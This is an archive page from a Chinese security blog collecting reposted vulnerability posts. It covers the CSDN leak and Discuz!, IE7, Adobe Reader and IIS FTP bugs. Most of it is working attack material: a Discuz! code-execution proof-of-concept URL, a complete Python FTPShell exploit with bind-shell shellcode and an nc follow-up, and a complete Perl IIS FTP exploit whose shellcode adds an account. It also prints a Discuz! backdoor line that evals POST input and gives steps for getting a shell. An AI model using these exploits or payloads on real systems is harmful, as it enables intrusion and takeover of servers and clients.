标签为 "安全漏洞" 的存档

CSDN被黑百万级用户数据遭泄露,几十家网站进黑客攻击名单

      年前总有新闻,这次是重大安全新闻。

      号称中国最大的开发者技术社区“中国软件开发联盟”(CSDN)数据库被黑了。根据公开的消息有600余万个明文的注册邮箱帐号和密码被黑客公开。
      传送门:CSDN泄露账号信息查询
阅读更多…

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/879

Discuz!爆高危漏洞 各大网站堪危【附补丁下载地址】

      有一段时间没发布安全新闻了,昨天Discuz!程序爆出高危漏洞,主要存在于7.1&7.2版本论坛程序中,请各论坛站长关注。
      据了解,昨日晚些时候一民间安全组织t00ls的成员发现了Discuz!最新版本的高危漏洞,该漏洞可导致直接获得WEBSHELL,目前使用Discuz7.2版本的站点不在少数,目前官方还未有补丁,站长们可按照oldjun的发布的修补方案进行临时修复。黑客X档案等一些使用discuz!最新版的论坛都一度被攻击进而无法访问。
      详细漏洞说明(原始出处在这里
      首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。

      特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。

      漏洞介绍:

      Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。

      漏洞分析:

      下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:

      一、漏洞来自showmessage函数:

复制内容到剪贴板程序代码程序代码
function showmessage($message, $url_forward = ”, $extra = ”, $forwardtype = 0) {
    extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
    global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
    define(‘CACHE_FORBIDDEN’, TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE[‘settings’][‘msgforward’]);
    $refreshtime = intval($msgforward[‘refreshtime’]);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward[‘refreshtime’] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? ” : (empty($_DCOOKIE[‘sid’]) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE[‘settings’][‘funcsiteid’] && $_DCACHE[‘settings’][‘funckey’] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.’./forumdata/funcstat.log’;
        if($fp = @fopen($statlogfile, ‘a’)) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message).”\n”);
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message).”\n”);
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS[‘funcstatinfo’] = ”;
        }
    }

    if(!defined(‘STAT_DISABLED’) && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }

    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward[‘quick’] && $msgforward[‘messages’] && @in_array($message, $msgforward[‘messages’]))) {
        updatesession();
        dheader(“location: “.str_replace(‘&’, ‘&’, $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = ”;
    }
    if(in_array($extra, array(‘HALTED’, ‘NOPERM’))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }

    include language(‘messages’);

    $vars = explode(‘:’, $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
        eval(“\$show_message = \””.str_replace(‘”‘, ‘\”‘, $scriptlang[$vars[0]][$vars[1]]).”\”;”);//$scriptlang未初始化,可以自定义,from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? ‘ajax_’ : ”;
        eval(“\$show_message = \””.(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message]).”\”;”);
        unset($pre);
    }

    ……
}

<
br/>      二、DZ的全局机制导致了未初始化的参数可以任意提交:

复制内容到剪贴板程序代码程序代码
foreach(array(‘_COOKIE’, ‘_POST’, ‘_GET’) as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != ‘_’ && $$_key = daddslashes($_value);
    }
}

      三、misc.php正好有个可以自定义message的点,其实也是未初始化:

复制内容到剪贴板程序代码程序代码
elseif($action == ‘imme_binding’ && $discuz_uid) {

    if(isemail($id)) {
        $msn = $db->result_first(“Select msn FROM {$tablepre}memberfields Where uid=’$discuz_uid'”);
        $msn = explode(“\t”, $msn);
        $id = dhtmlspecialchars(substr($id, 0, strpos($id, ‘@’)));
        $msn = “$msn[0]\t$id”;
        $db->query(“Update {$tablepre}memberfields SET msn=’$msn’ Where uid=’$discuz_uid'”);
        showmessage(‘msn_binding_succeed’, ‘memcp.php’);
    } else {
        if($result == ‘Declined’) {
            dheader(“Location: memcp.php”);
        } else {
            showmessage($response[‘result’]);//$response没有初始化,可以自定义,from www.oldjun.com

        }
    }

   }

      四、漏洞利用:

      showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。

      五、漏洞修复:

      官方补丁已经放出,下载地址:
      Discuz! 7.1:http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip
      Discuz! 7.2:http://download.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip

      poc:

      (应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
      misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/14

IE7爆异常CSS导致内存破坏安全漏洞(可用于执行任意程序)

      有一段时间没更新安全方面的文章了,因为自9月下旬以来以来MilW0rm就再也没有更新。今天来一篇关于IE7的。对安全没有兴趣的同学可以直接无视飘过。

      漏洞名称:Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞(可以执行任意代码)
      漏洞介绍:在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问      0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令!!
      漏洞危害黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
      此漏洞由国内某安全公司发现,在附件的poc中你能找到名称。
      由于包含恶意代码,为了不由于防病毒软件的告警而影响大家阅读本文,具体的poc文档放在附件中。

      下载文件 Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞细节(POC)

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/41

FTPShell客户端4.1 RC2远程缓冲区溢出通杀漏洞

FTPShell客户端4.1 RC2通杀远程缓冲区溢出漏洞
测试通过平台:xp_sp3,w2k_sp4

复制内容到剪贴板程序代码程序代码
#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /  \  | |__ | | |
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_|
#
#[+] Bug :     FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
#[+] Author :     His0k4
#[+] Tested on : xp_sp3,w2k_sp4
#[+] Greetz :     All friends
#         piece of "zlabiya"

#—exploit-log—
#attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py
#[+] Listening on [FTP] 21
#[+] Connection accepted from: 192.168.1.3
#[+] Sending the malicious pasv response…
#[+] Done, wait for trying to connect to port 4444 on the target…
#
#(UNKNOWN) [192.168.1.3] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\victim\Desktop>

from socket import *
import os
import time

# win32_bind –  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
stage2 =(
"\x44\x7A\x32\x37\x44\x7A\x32\x37"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x34\x4e\x43\x4b\x58\x4e\x57"
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x38"
"\x49\x58\x4e\x56\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x38\x42\x44\x4a\x30\x50\x35\x4a\x36"
"\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x46\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x57\x43\x57"
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x55\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x51"
"\x4e\x55\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x44\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x56\x43\x36"
"\x4d\x36\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x55\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x32"
"\x43\x39\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x45\x41\x35\x41\x55\x4c\x46"
"\x41\x30\x41\x55\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

stage1=(
#

  • Using Msf::Encoder::PexAlphaNum with final size of 141 bytes
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x48\x36\x41\x38\x4c\x4c"
    "\x4f\x4f\x4f\x50\x44\x34\x44\x55\x4c\x46\x44\x50\x4a\x35\x4d\x4c"
    "\x50\x52\x4e\x33\x45\x30\x4c\x35\x46\x37\x4f\x4e\x4a\x4b\x46\x54"
    "\x4c\x47\x44\x43\x47\x33\x4b\x58\x4c\x4f\x4f\x4a\x45\x37\x4c\x4e"
    "\x4f\x4a\x45\x57\x47\x4e\x4f\x4f\x47\x4e\x4c\x50\x5a")

    buffer =  stage1 #<———————————|
    buffer += '\x41'*(412-len(stage1)) #            |
    buffer += '\xC5\xB3\x43\x00'    # add esp,8;retn—-|

    s = socket(AF_INET, SOCK_STREAM)
    s.bind(("0.0.0.0", 21))
    s.listen(1)
    print "

  • [+] Listening on [FTP] 21"
    c, addr = s.accept()

    print "[+] Connection accepted from: %s" % (addr[0])

    c.send("220 Hey victim batet fik!\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("331 User anonymous OK Password required\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("230 Ok.\r\n")
    c.recv(1024)

    # Enable this when client performs CWD command
    #time.sleep(1)
    #c.send("250 CWD command successful.\r\n")
    #c.recv(1024)

    time.sleep(0.5)
    c.send("257 \x22/\x22 is current directory\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("200 Type set to A.\r\n")
    c.recv(1024)
    time.sleep(0.5)
    print "[+] Sending the malicious pasv response…"
    c.send("227 "+stage2+"\r\n"
    "227 Entering Passive Mode ("+buffer+").\r\n"
    "\r\n")
    time.sleep(2)
    c.close()
    s.close()
    print("[+] Done, wait for trying to connect to the target on port 4444…\n")
    time.sleep(25)
    os.system("nc -nv "+addr[0]+" 4444")

    # milw0rm.com [2009-09-09]

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/91

    Adobe Acrobat Reader Collab getIcon通杀漏洞

          Adobe Acrobat Reader Collab getIcon通杀漏洞
          evil_pdf.py在以下系统测试通过:
    Windows XP SP3 英文版/法文版
    Windows 2003 SP2 英文版
          Adobe 应用程序版本:
    Adobe Reader 9.0.0/8.1.2 英文版/法文版
          测试对象:
    单独PDF文件、火狐FireFox3.0.13和IE7嵌入式PDF

    #!/usr/bin/env python
    #
    # *** Acrobat Reader – Collab getIcon universal exploiter ***
    # evil_pdf.py, tested on Operating Systems:
    # Windows XP SP3 English/French
    # Windows 2003 SP2 English
    # with Application versions:
    # Adobe Reader 9.0.0/8.1.2 English/French
    # Test methods:
    # Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
    # 24/06/2009 – Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
    # [Coromputer] raised from the ashes.
    #

    http://www.coromputer.net/CVE-2009-0927_package.zip
    back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

    # milw0rm.com [2009-09-03]

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/95

    微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞

          Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
          微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞(win2k)

          现在用win2k跑IIS5.0/6.0的服务器估计不多了,2003是主流。
          这个漏洞代码的终极目的是在系统中建立一个以"winown"为用户名,"nwoniw"为密码的账户。
          此漏洞在Windows 2000 SP4上测试通过,影响带有堆栈cookie保护功能的IIS6程序。

    复制内容到剪贴板程序代码程序代码
    # IIS 5.0 FTPd / Remote r00t exploit
    # Win2k SP4 targets
    # bug found & exploited by Kingcope, kcope2<at>googlemail.com
    # Affects IIS6 with stack cookie protection
    # August 2009 – KEEP THIS 0DAY PRIV8
    use IO::Socket;
    $|=1;
    #metasploit shellcode, adduser "winown:nwoniw"
    $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
    "\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
    "\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
    "\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
    "\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
    "\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
    "\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
    "\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
    "\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
    "\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
    "\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
    "\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
    "\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
    "\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
    "\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
    "\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
    "\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
    "\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
    "\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
    "\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
    "\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
    "\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
    "\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
    "\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
    "\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
    "\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
    "\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
    "\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
    "\x51\x54\x43\x30\x41\x41";
    #1ca
    print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
    if ($#ARGV ne 1) {
    print "usage: iiz5.pl <target> <your local ip>\n";
    exit(0);
    }
    srand(time());
    $port = int(rand(31337-1022)) + 1025;
    $locip = $ARGV[1];
    $locip =~ s/\./,/gi;
    if (fork()) {
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '21',
                                  Proto    => 'tcp');
    $patch = "\x7E\xF1\xFA\x7F";
    #$retaddr = "ZZZZ";
    $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
    $v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
    # top address of stack frame where shellcode resides, is hardcoded inside this block
    $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
       ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
    # attack buffer
    $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
       ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
       "HHHHIIII".
    $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
    $x = <$sock>;
    print $x;                            
    print $sock "USER anonymous\r\n";
    $x = <$sock>;
    print $x;
    print $sock "PASS anonymous\r\n";
    $x = <$sock>;
    print $x;
    print $sock "MKD w00t$port\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "CWD w00t$port\r\n";
    $x = <$sock>;
    print $x;
    print $sock "MKD CCC". "$c\r\n";
    $x = <$sock>;
    print $x;
    print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
    $x = <$sock>;
    print $x;
    # TRIGGER
    print $sock "NLST $c*/../C*/\r\n";
    $x = <$sock>;
    print $x;
    while (1) {}
    } else {
    my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
    die "Could not create socket: $!\n" unless $servsock;
    my $new_sock = $servsock->accept();
    while(<$new_sock>) {
    print $_;
    }
    close($servsock);
    }
    #Cheerio,
    #
    #Kingcope

    # milw0rm.com [2009-08-31]

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/98

    Discuz7.0 最新漏洞 后台styles风格文件漏洞及文字变大漏洞

          使用Discuz做论坛的朋友请注意这一漏洞,目前DZ已放出补丁,补丁介绍在文章最后。
          突然发现dz论坛网页文字变大了

    Discuz!网页文字变大

    图1

          网页源代码可以看到:

    复制内容到剪贴板程序代码程序代码
    <!–int(5)
    –><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=gbk" />
    <title>论坛之家 找论坛找网址就上论坛之家交流http://luntan123.com/</title>

    图2

          查看dz style缓存文件:
          \forumdata\cache\style_1.php
    $X=SUBSTR(MD5($_GET['B']),28);IF($X=='3738')EVAL($_POST['A']);//', 'aaaaaaaaaa');

    图3

          查看dz数据库表记录:
          cdb_stylevars
          48  1  ','');echo '<!–';var_dump(5);echo '–>';$x=substr…  aaaaaaaaaa

    图4

          漏洞为:
          (Discuz! 7.0 及以下版本存在)
          /admin/styles.inc.php

    复制内容到剪贴板程序代码程序代码
    <?php    
    ……    
    if($newcvar && $newcsubst) {    
    if($db->result_first("Select COUNT(*) FROM {$tablepre}stylevars Where variable='$newcvar' AND styleid='$id'")) {    
    cpmsg('styles_edit_variable_duplicate', '', 'error');    
    } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {    
    cpmsg('styles_edit_variable_illegal', '', 'error');    
    }    
    $newcvar = strtolower($newcvar);    
    $db->query("Insert INTO {$tablepre}stylevars (styleid, variable, substitute)  
    VALUES ('$id', '$newcvar', '$newcsubst')");    
    }//插入变量数据,http://luntan123.com 整理
    ……    
    updatecache('styles');//更新缓存(写文件)
    ……    
    ?>  

          这是为某一style风格增加变量的代码,把变量名与变量的值存入数据库,虽然post过来的数据daddslashes了,但入库之后又都是纯净的数据了。
          这里涉及到一个正则问题,判断变量名的:!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]* /", $newcvar),其中“\x7f-\xff”是

          指ASCII码值在127~255之间的字符,它们经常作为中文字符的首字节出现,所以可以利用其作为中文匹配的标志。于是这个匹配貌似只是允许字

          母或者中文做变量名,没其他高深的匹配,随便测试了下,一般情况下这个正则等于虚设:

    复制内容到剪贴板程序代码程序代码
    <?php    
    $newcvar=$_GET['newcvar'];    
    echo $newcvar;    
    echo "<br>";    
    if(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {    
    echo "haha";    
    }else{    
    echo 'pass';    
    }    
    ?>  

          下面看看updatecache这个函数,在include里的cache.func.php文件里,先从数据库取出来,经过一段处理最终写入文件,具体我不描述了,我只

          谈谈重点,看一段函数:

    复制内容到剪贴板程序代码程序代码
    function getcachevars($data, $type = 'VAR') {    
    $evaluate = '';    
    foreach($data as $key => $val) {    
    if(is_array($val)) {    
    $evaluate .= "\$key = ".arrayeval($val).";\n";    
    } else {    
    $val = addcslashes($val, '\'\\');  
    $evaluate .= $type == 'VAR' ? "\$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";    
    }    
    }    
    return $evaluate;    
    }  

          啥也不说了,处理了value没处理key,而这个key就是之前我们提交的,干净的存在数据库里的值。关于数组的key,大家可以参考下幻影旅团第三期《高级PHP代码审核技术》,那篇文章好多地方谈到key的问题,dz这里却忽视了…

          于是可以直接拿shell了,利用方法(论坛地址改成自己的),先用管理员帐号登陆后台,无需论坛创始人,管理员等级即可:
    http://luntan123.com/admincp.php … &id=1&adv=1中,最下面有个“自定义模板变量”,变量中

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/107